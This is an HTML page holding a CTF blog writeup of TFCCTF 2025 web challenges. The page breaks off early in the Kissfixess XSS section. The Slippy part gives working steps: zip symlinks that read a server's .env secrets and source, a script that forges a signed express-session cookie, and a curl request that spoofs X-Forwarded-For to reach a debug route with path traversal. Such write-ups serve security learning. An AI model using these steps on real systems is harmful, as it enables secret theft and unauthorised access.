<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>TFC CTF 2025 Writeups -
</title><link rel=alternate href=https://h4r1337.github.io/posts/tfcctf-25/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/tfcctf-25/><link rel=prev href=https://h4r1337.github.io/posts/boi_android_malware/><link rel=next href=https://h4r1337.github.io/posts/shellshock/><meta name=description content="TFCCTF 2025 writeups for web challenges Slippy, Kissfixess, and Kissfixess Revenge "><meta name=keywords content="TFCCTF 2025,TFCCTF writeup,CTF writeup 2025,Slippy challenge,Kissfixess challenge,Kissfixess Revenge,zip slip,zip symlink exploit,zip traversal exploit,path traversal,symlink in zip,express-session exploit,connect.sid signing,session cookie forge,session secret leak,Node.js security,Docker flag leak,debug route bypass,XSS CTF,server-side template injection,mako template injection,XSS payload evasion,String.fromCharCode payload,ngrok webhook exfil,cookie exfiltration,Chrome headless bot exploitation,CTF walkthrough payloads,penetration testing writeup,web security blog"><meta property="og:url" content="https://h4r1337.github.io/posts/tfcctf-25/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="TFC CTF 2025 Writeups"><meta property="og:description" content="TFCCTF 2025 writeups for web challenges Slippy, Kissfixess, and Kissfixess Revenge "><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2025-09-03T14:47:28+05:30"><meta property="article:modified_time" content="2025-09-03T14:47:28+05:30"><meta property="article:tag" content="Ctf"><meta property="article:tag" content="Tfcctf"><meta property="article:tag" content="Zipslip"><meta property="article:tag" content="Xss"><meta property="article:tag" content="Express-Session"><meta property="article:tag" content="Mako"><meta property="og:image" content="https://h4r1337.github.io/img/tfcctf-25/cover.webp"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/tfcctf-25/cover.webp"><meta name=twitter:title content="TFC CTF 2025 Writeups"><meta name=twitter:description content="TFCCTF 2025 writeups for web challenges Slippy, Kissfixess, and Kissfixess Revenge "><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/ctf/ class=tag>CTF</a>
,
<a href=https://h4r1337.github.io/tags/tfcctf/ class=tag>TFCCTF</a>
,
<a href=https://h4r1337.github.io/tags/zipslip/ class=tag>ZIPSLIP</a>
,
<a href=https://h4r1337.github.io/tags/xss/ class=tag>XSS</a>
,
<a href=https://h4r1337.github.io/tags/express-session/ class=tag>EXPRESS-SESSION</a>
,
<a href=https://h4r1337.github.io/tags/mako/ class=tag>MAKO</a>
,
<a href=https://h4r1337.github.io/tags/ssti/ class=tag>SSTI</a></span></div><h1 class=header-title itemprop=headline>TFC CTF 2025 Writeups</h1><div class=post-meta><time datetime="2025-09-03 14:47:28 +0530 +0530" itemprop=datePublished>2025-09-03
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2025-09-03 14:47:28 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>TFCCTF 2025 writeups for web challenges Slippy, Kissfixess, and Kissfixess Revenge</span></div></header><div class=page-content itemprop=articleBody><p>These are writeups for some of the challenges I solved during TFCCTF 2025.</p><h2 id=slippy><a href=#slippy class=anchor-head aria-label=Anchor></a>Slippy</h2><blockquote><p>Slipping Jimmy keeps playing with Finger.</p></blockquote><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903115341.webp></figure><p>The server allows zip file upload. Once the user upload a zip file, it tries to extract its contents into the uploads directory.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span>router.post(<span style=color:#b8bb26>&#39;/upload&#39;</span>, upload.single(<span style=color:#b8bb26>&#39;zipfile&#39;</span>), (req, res) =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> zipPath <span style=color:#fe8019>=</span> req.file.path;
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> userDir <span style=color:#fe8019>=</span> path.join(__dirname, <span style=color:#b8bb26>&#39;../uploads&#39;</span>, req.session.userId);
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>    fs.mkdirSync(userDir, { recursive<span style=color:#fe8019>:</span> <span style=color:#fe8019>true</span> });
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>    <span style=color:#928374;font-style:italic>// Command: unzip temp/file.zip -d target_dir
</span></span></span><span style=display:flex><span><span style=color:#928374;font-style:italic></span>    execFile(<span style=color:#b8bb26>&#39;unzip&#39;</span>, [zipPath, <span style=color:#b8bb26>&#39;-d&#39;</span>, userDir], (err, stdout, stderr) =&gt; {
</span></span><span style=display:flex><span>      fs.unlinkSync(zipPath); <span style=color:#928374;font-style:italic>// Clean up temp file
</span></span></span><span style=display:flex><span><span style=color:#928374;font-style:italic></span>  
</span></span><span style=display:flex><span>      <span style=color:#fe8019>if</span> (err) {
</span></span><span style=display:flex><span>        console.error(<span style=color:#b8bb26>&#39;Unzip failed:&#39;</span>, stderr);
</span></span><span style=display:flex><span>        <span style=color:#fe8019>return</span> res.status(<span style=color:#d3869b>500</span>).send(<span style=color:#b8bb26>&#39;Unzip error&#39;</span>);
</span></span><span style=display:flex><span>      }
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>      res.redirect(<span style=color:#b8bb26>&#39;/files&#39;</span>);
</span></span><span style=display:flex><span>    });
</span></span><span style=display:flex><span>  });
</span></span></code></pre></div><p>Files inside the uploads directory is listed in the <code>/files</code> endpoint:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span>router.get(<span style=color:#b8bb26>&#39;/files&#39;</span>, (req, res) =&gt; {
</span></span><span style=display:flex><span>  <span style=color:#fe8019>const</span> userDir <span style=color:#fe8019>=</span> path.join(__dirname, <span style=color:#b8bb26>&#39;../uploads&#39;</span>, req.session.userId);
</span></span><span style=display:flex><span>  fs.readdir(userDir, (err, files) =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> (err) <span style=color:#fe8019>return</span> res.status(<span style=color:#d3869b>500</span>).send(<span style=color:#b8bb26>&#39;Error reading files&#39;</span>);
</span></span><span style=display:flex><span>    res.render(<span style=color:#b8bb26>&#39;files&#39;</span>, { files });
</span></span><span style=display:flex><span>  });
</span></span><span style=display:flex><span>});
</span></span></code></pre></div><p>And each files inside it can be downloaded by the user:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span>router.get(<span style=color:#b8bb26>&#39;/files/:filename&#39;</span>, (req, res) =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> userDir <span style=color:#fe8019>=</span> path.join(__dirname, <span style=color:#b8bb26>&#39;../uploads&#39;</span>, req.session.userId);
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> requestedPath <span style=color:#fe8019>=</span> path.normalize(req.params.filename);
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> filePath <span style=color:#fe8019>=</span> path.resolve(userDir, requestedPath);
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>    <span style=color:#928374;font-style:italic>// Prevent path traversal
</span></span></span><span style=display:flex><span><span style=color:#928374;font-style:italic></span>    <span style=color:#fe8019>if</span> (<span style=color:#fe8019>!</span>filePath.startsWith(path.resolve(userDir))) {
</span></span><span style=display:flex><span>      <span style=color:#fe8019>return</span> res.status(<span style=color:#d3869b>400</span>).send(<span style=color:#b8bb26>&#39;Invalid file path&#39;</span>);
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> (fs.existsSync(filePath) <span style=color:#fe8019>&amp;&amp;</span> fs.statSync(filePath).isFile()) {
</span></span><span style=display:flex><span>      res.download(filePath);
</span></span><span style=display:flex><span>    } <span style=color:#fe8019>else</span> {
</span></span><span style=display:flex><span>      res.status(<span style=color:#d3869b>404</span>).send(<span style=color:#b8bb26>&#39;File not found&#39;</span>);
</span></span><span style=display:flex><span>    }
</span></span><span style=display:flex><span>  });
</span></span></code></pre></div><p>With this info we can try creating a zip file with symlinks to files like <code>/etc/passwd</code> and when the server extracts the file inside the uploads directory, will point to <code>/etc/passwd</code> of the server.
We can use this technique to create a zip containing a symlink pointing to the flag in the server and read it once the server extracts our zip file. But there&rsquo;s a line in the <code>Dockerfile</code> that stops us from doing this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-Dockerfile data-lang=Dockerfile><span style=display:flex><span><span style=color:#fe8019>RUN</span> rand_dir<span style=color:#fe8019>=</span><span style=color:#b8bb26>&#34;/</span><span style=color:#fe8019>$(</span>head /dev/urandom | tr -dc a-z0-9 | head -c 8<span style=color:#fe8019>)</span><span style=color:#b8bb26>&#34;</span>; mkdir <span style=color:#b8bb26>&#34;</span>$rand_dir<span style=color:#b8bb26>&#34;</span> <span style=color:#fe8019>&amp;&amp;</span> <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;TFCCTF{Fake_fLag}&#34;</span> &gt; <span style=color:#b8bb26>&#34;</span>$rand_dir<span style=color:#b8bb26>/flag.txt&#34;</span> <span style=color:#fe8019>&amp;&amp;</span> chmod -R +r <span style=color:#b8bb26>&#34;</span>$rand_dir<span style=color:#b8bb26>&#34;</span>
</span></span></code></pre></div><p>It make sure that the <code>flag.txt</code> is located in a randomly generated directory. Without knowing the name of this directory, we can&rsquo;t create a proper symlink to the flag. Therefore somehow we have to leak the name of this directory to read the flag.
There&rsquo;s a <code>/debug/files/</code> route which can be used to list the files in a directory:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span>router.get(<span style=color:#b8bb26>&#39;/debug/files&#39;</span>, developmentOnly, (req, res) =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>const</span> userDir <span style=color:#fe8019>=</span> path.join(__dirname, <span style=color:#b8bb26>&#39;../uploads&#39;</span>, req.query.session_id);
</span></span><span style=display:flex><span>    fs.readdir(userDir, (err, files) =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> (err) <span style=color:#fe8019>return</span> res.status(<span style=color:#d3869b>500</span>).send(<span style=color:#b8bb26>&#39;Error reading files&#39;</span>);
</span></span><span style=display:flex><span>    res.render(<span style=color:#b8bb26>&#39;files&#39;</span>, { files });
</span></span><span style=display:flex><span>  });
</span></span><span style=display:flex><span>});
</span></span></code></pre></div><p>We can pass any path to <code>session_id</code> query parameter to list the files inside that path.
It uses a <code>developmentOnly</code> middleware to checks if the session&rsquo;s <code>userId</code> is &ldquo;develop&rdquo; and the requesting IP is <code>127.0.0.1</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>module.exports <span style=color:#fe8019>=</span> <span style=color:#fe8019>function</span> <span style=color:#fe8019>(</span>req, res, next<span style=color:#fe8019>)</span> <span style=color:#fe8019>{</span>
</span></span><span style=display:flex><span>  console.log<span style=color:#fe8019>(</span>req.session.userId, req.ip<span style=color:#fe8019>)</span>;
</span></span><span style=display:flex><span>  <span style=color:#fe8019>if</span> <span style=color:#fe8019>(</span>req.session.userId <span style=color:#fe8019>===</span> <span style=color:#b8bb26>&#34;develop&#34;</span> <span style=color:#fe8019>&amp;&amp;</span> req.ip <span style=color:#fe8019>==</span> <span style=color:#b8bb26>&#34;127.0.0.1&#34;</span><span style=color:#fe8019>)</span> <span style=color:#fe8019>{</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> next<span style=color:#fe8019>()</span>;
</span></span><span style=display:flex><span>  <span style=color:#fe8019>}</span>
</span></span><span style=display:flex><span>  res.status<span style=color:#fe8019>(</span>403<span style=color:#fe8019>)</span>.send<span style=color:#fe8019>(</span><span style=color:#b8bb26>&#34;Forbidden: Development access only&#34;</span><span style=color:#fe8019>)</span>;
</span></span><span style=display:flex><span><span style=color:#fe8019>}</span>;
</span></span></code></pre></div><p>IP address check can be bypassed by adding an <code>X-Forwarded-For: 127.0.0.1</code> header to the request. But forging a session with <code>userId</code> set to &ldquo;develop&rdquo; is not that easy, even if we have access to the session secret.
The app uses <code>express-session</code> for session management. Session data is not stored in cookie itself, just the session ID. Session data is stored server side (by default using a <code>MemoryStore</code> which will store it inside memory, but there are other compatible persistent storage methods). The client only have access to the <code>connect.sid</code> cookie which consists of the session ID, signed using the session secret.
The format of a <code>connect.sid</code> is as follows:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span><span style=color:#b8bb26>&#39;s:&#39;</span> <span style=color:#fe8019>+</span> session_id <span style=color:#fe8019>+</span> <span style=color:#b8bb26>&#39;.&#39;</span> <span style=color:#fe8019>+</span> crypto.createHmac(<span style=color:#b8bb26>&#39;sha256&#39;</span>, secret).update(val).digest(<span style=color:#b8bb26>&#39;base64&#39;</span>).replace(<span style=color:#b8bb26>/\=+$/</span>, <span style=color:#b8bb26>&#39;&#39;</span>);
</span></span></code></pre></div><p>So even if we have the session secret, all we can control is the session ID.
Fortunately for us a session with <code>userId</code> set to &ldquo;develop&rdquo; is created on startup of the application:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span><span style=color:#fe8019>const</span> store <span style=color:#fe8019>=</span> <span style=color:#fe8019>new</span> session.MemoryStore();
</span></span><span style=display:flex><span><span style=color:#fe8019>const</span> sessionData <span style=color:#fe8019>=</span> {
</span></span><span style=display:flex><span>    cookie<span style=color:#fe8019>:</span> {
</span></span><span style=display:flex><span>      path<span style=color:#fe8019>:</span> <span style=color:#b8bb26>&#39;/&#39;</span>,
</span></span><span style=display:flex><span>      httpOnly<span style=color:#fe8019>:</span> <span style=color:#fe8019>true</span>,
</span></span><span style=display:flex><span>      maxAge<span style=color:#fe8019>:</span> <span style=color:#d3869b>1000</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>60</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>60</span> <span style=color:#fe8019>*</span> <span style=color:#d3869b>48</span> <span style=color:#928374;font-style:italic>// 1 hour
</span></span></span><span style=display:flex><span><span style=color:#928374;font-style:italic></span>    },
</span></span><span style=display:flex><span>    userId<span style=color:#fe8019>:</span> <span style=color:#b8bb26>&#39;develop&#39;</span>
</span></span><span style=display:flex><span>};
</span></span><span style=display:flex><span>store.set(<span style=color:#b8bb26>&#39;&lt;REDACTED&gt;&#39;</span>, sessionData, err =&gt; {
</span></span><span style=display:flex><span>    <span style=color:#fe8019>if</span> (err) console.error(<span style=color:#b8bb26>&#39;Failed to create develop session:&#39;</span>, err);
</span></span><span style=display:flex><span>    <span style=color:#fe8019>else</span> console.log(<span style=color:#b8bb26>&#39;Development session created!&#39;</span>);
</span></span><span style=display:flex><span>  });
</span></span><span style=display:flex><span>  
</span></span><span style=display:flex><span>app.use(
</span></span><span style=display:flex><span>  session({
</span></span><span style=display:flex><span>    secret<span style=color:#fe8019>:</span> process.env.SESSION_SECRET,
</span></span><span style=display:flex><span>    resave<span style=color:#fe8019>:</span> <span style=color:#fe8019>false</span>,
</span></span><span style=display:flex><span>    saveUninitialized<span style=color:#fe8019>:</span> <span style=color:#fe8019>false</span>,
</span></span><span style=display:flex><span>    store<span style=color:#fe8019>:</span> store,
</span></span><span style=display:flex><span>  }),
</span></span><span style=display:flex><span>);
</span></span></code></pre></div><p>With this info all we have to do is to leak the <code>server.js</code> file to read the session ID, and leak the <code>.env</code> file to read the <code>SESSION_SECRET</code> and sign a new <code>connect.sid</code> cookie with the session ID and secret.</p><h3 id=exploit><a href=#exploit class=anchor-head aria-label=Anchor></a>Exploit</h3><p>Create a symlink for files <code>.env</code> and <code>server.js</code> and create a zip file with these files</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ln -s /app/.env env
</span></span><span style=display:flex><span>ln -s /app/server.js server.js
</span></span><span style=display:flex><span>zip --symlinks test.zip env server.js
</span></span></code></pre></div><p>Upload the zip, and download the <code>env</code> and <code>server.js</code> to read the session id and secret.</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903133306.webp></figure><p>Sign a new <code>connect.sid</code> cookie using these values:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=display:flex><span><span style=color:#fe8019>const</span> crypto <span style=color:#fe8019>=</span> require(<span style=color:#b8bb26>&#39;crypto&#39;</span>);
</span></span><span style=display:flex><span><span style=color:#fe8019>function</span> sign(value, secret) {
</span></span><span style=display:flex><span>  <span style=color:#fe8019>return</span> value <span style=color:#fe8019>+</span> <span style=color:#b8bb26>&#39;.&#39;</span> <span style=color:#fe8019>+</span> crypto
</span></span><span style=display:flex><span>    .createHmac(<span style=color:#b8bb26>&#39;sha256&#39;</span>, secret)
</span></span><span style=display:flex><span>    .update(value)
</span></span><span style=display:flex><span>    .digest(<span style=color:#b8bb26>&#39;base64&#39;</span>)
</span></span><span style=display:flex><span>    .replace(<span style=color:#b8bb26>/\=+$/</span>, <span style=color:#b8bb26>&#39;&#39;</span>);
</span></span><span style=display:flex><span>};
</span></span><span style=display:flex><span>console.log(<span style=color:#b8bb26>&#39;s:&#39;</span> <span style=color:#fe8019>+</span> sign(<span style=color:#b8bb26>&#39;session_id&#39;</span>, <span style=color:#b8bb26>&#39;session_secret&#39;</span>));
</span></span></code></pre></div><p>Send request to <code>/debug/files</code> with the generated cookie:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>curl -ik <span style=color:#b8bb26>&#39;http://127.0.0.1:3000/debug/files?session_id=/../../../../&#39;</span> -H <span style=color:#b8bb26>&#39;X-Forwarded-For: 127.0.0.1&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: connect.sid=s:session_cookie&#39;</span>
</span></span></code></pre></div><p>It will show the directory in the root, where the <code>flag.txt</code> is present:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903133928.webp></figure><p>Create another zip with symlink to flag:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>ln -s /h8hz72zl/flag.txt flag.txt
</span></span><span style=display:flex><span>zip --symlinks flag.zip flag.txt
</span></span></code></pre></div><p>Upload the zip and download the flag:</p><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903134239.webp></figure><h2 id=kissfixess><a href=#kissfixess class=anchor-head aria-label=Anchor></a>Kissfixess</h2><blockquote><p>Kiss My Fixes.<br>Ain&rsquo;t nobody solving this now.</p></blockquote><figure><img src=/img/tfcctf-25/Pasted%20image%2020250903135339.webp></figure><p>This one is an XSS challenge. The <code>input_name</code> parameter is reflected in the page. There&rsquo;s a chromium bot that will visit url with the name we provide when we click the Report Name button:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>visit_url</span>(name: <span style=color:#fabd2f>str</span>, timeout: <span style=color:#fabd2f>int</span> <span style=color:#fe8019>=</span> <span style=color:#d3869b>30</span>):
</span></span><span style=display:flex><span>  [<span style=color:#fe8019>...</span>]
</span></span><span style=display:flex><span>  <span style=color:#fe8019>try</span>:
</span></span><span style=display:flex><span>	[<span style=color:#fe8019>...</span>]
</span></span><span style=display:flex><span>    driver<span style=color:#fe8019>.</span>add_cookie({
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;name&#34;</span>: <span style=color:#b8bb26>&#34;flag&#34;</span>,
</span></span><span style=display:flex><span>        <span style=color:#b8bb26>&#34;value&#34;</span>: <span style=color:#b8bb26>&#34;TFCCTF{~}&#34;</span>,
</span></span><span style=display:flex><span>    })
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span>    encoded_name <span style=color:#fe8019>=</span> quote(name)
</span></span><span style=display:flex><span>    driver<span style=color:#fe8019>.</span>get(<span style=color:#b8bb26>f</span><span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>{</span>URL_BASE<span style=color:#b8bb26>}</span><span style=color:#b8bb26>/?name_input=</span><span style=color:#b8bb26>{</span>encoded_name<span style=color:#b8bb26>}</span><span style=color:#b8bb26>&#34;</span>)
</span></span><span style=display:flex><span>    <span style=color:#928374;font-style:italic># allow some time for JS to execute</span>
</span></span><span style=display:flex><span>    time<span style=color:#fe8019>.</span>sleep(<span style=color:#d3869b>200</span>)
</span></span><span style=display:flex><span>    driver<span style=color:#fe8019>.</span>quit()
</span></span></code></pre></div><p>The flag is inside the cookie of this bot. We have to leak it via XSS. But some characters are filtered from the <code>input_name</code> parameter:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span>banned <span style=color:#fe8019>=</span> [<span style=color:#b8bb26>&#34;s&#34;</span>, <span style=color:#b8bb26>&#34;l&#34;</span>, <span style=color:#b8bb26>&#34;(&#34;</span>, <span style=color:#b8bb26>&#34;)&#34;</span>, <span style=color:#b8bb26>&#34;self&#34;</span>, <span style=color:#b8bb26>&#34;_&#34;</span>, <span style=color:#b8bb26>&#34;.&#34;</span>, <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>\&#34;</span><span style=color:#b8bb26>&#34;</span>, <span style=color:#b8bb26>&#34;</span><span style=color:#b8bb26>\\</span><span style=color:#b8bb26>&#34;</span>, <span style=color:#b8bb26>&#34;import&#34;</span>, <span style=color:#b8bb26>&#34;eval&#34;</span>, <span style=color:#b8bb26>&#34;exec&#34;</span>, <span style=color:#b8bb26>&#34;os&#34;</span>, <span style=color:#b8bb26>&#34;;&#34;</span>, <span style=color:#b8bb26>&#34;,&#34;</span>, <span style=color:#b8bb26>&#34;|&#34;</span>]
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>escape_html</span>(text):
</span></span><span style=display:flex><span>    <span style=color:#b8bb26>&#34;&#34;&#34;Escapes HTML special characters in the given text.&#34;&#34;&#34;</span>
</span></span><span style=display:flex><span>    <span style=color:#fe8019>return</span> text<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;&amp;&#34;</span>, <span style=color:#b8bb26>&#34;&amp;amp;&#34;</span>)<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;&lt;&#34;</span>, <span style=color:#b8bb26>&#34;&amp;lt;&#34;</span>)<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;&gt;&#34;</span>, <span style=color:#b8bb26>&#34;&amp;gt;&#34;</span>)<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;(&#34;</span>, <span style=color:#b8bb26>&#34;&amp;#40;&#34;</span>)<span style=color:#fe8019>.</span>replace(<span style=color:#b8bb26>&#34;)&#34;</span>, <span style=color:#b8bb26>&#34;&amp;#41;&#34;</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#fe8019>def</span> <span style=color:#fabd2f>render_page</span>(name_to_display<span style=color:#fe8019>=</span><span style=color:#fe8019>None</span>):
</span></span><span style=display:flex><span>    <span style=color:#b8bb26>&#34;&#34;&#34;Renders the HTML page with the given name.&#34;&#34;&#34;</span>
